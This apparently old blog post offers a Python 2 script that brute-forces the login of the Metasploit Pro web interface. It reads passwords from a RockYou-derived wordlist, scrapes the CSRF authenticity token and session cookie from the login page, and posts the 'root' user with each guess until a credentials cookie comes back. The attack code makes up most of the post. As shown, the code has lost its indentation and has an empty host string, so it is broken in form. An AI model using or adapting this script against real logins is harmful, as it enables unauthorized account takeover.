Saturday, May 16, 2015

Old Python Script to Brute-Force Metasploit Pro Web Interface

I wrote this python script to brute force a login to Metasploit Pro.  I doubt that it works for the current release because I believe they added a login threshold of 10 failed logins and it locks the account.


import httplib

fpasswords = open('modRockyou.txt')
for password in fpasswords:
f = open('getResponse.txt','w')

conn = httplib.HTTPSConnection("")
conn.request("GET", "/login")
#conn.request("POST", "/user_sessions", postParam)
r1 = conn.getresponse()

f = open('getResponse.txt')
for line in f:
if "authenticity_token" in line:
auth_token = line[193:237] # Pulls the authenticity token out of the GET request
#print "----"
#print line[193:237]
#print auth_token
#print " "

header = r1.getheaders()
#print header

header2 = dict(r1.getheaders())
if header2.has_key('set-cookie'):
#print header2['set-cookie']
#print " "
ui_session_raw = header2['set-cookie']
ui_session =  ui_session_raw[0:234]

# Now that I have the authenticity_token from the GET response and the ui_session cookie I can send the post back into the server

#postParam = "utf8=%E2%9C%93&authenticity_token=hydDI8OCWE533edVJma3%2BJgVJUKOaqB1GNEL7XN9rq8%3D&user_session%5Busername%5D=root&user_session%5Bpassword%5D=mypassword&commit=Sign+in"

postParam = "utf8=%E2%9C%93&authenticity_token=" + auth_token + "&user_session%5Busername%5D=root&user_session%5Bpassword%5D=" + password.rstrip() + "&commit=Sign+in"


headers = {"Cookie" : ui_session}

#print postParam
#print ' '
#print headers
#print ' '

conn.request("POST", "/user_sessions", postParam, headers)
r2 = conn.getresponse()
header3 = r2.getheaders()
#print header3
#print ' '
print password
#print ' '
header4 = dict(r2.getheaders())

user_cred_raw = header4['set-cookie']
if "user_credentials" in user_cred_raw:
info = "Login was successful with password " + password
print info



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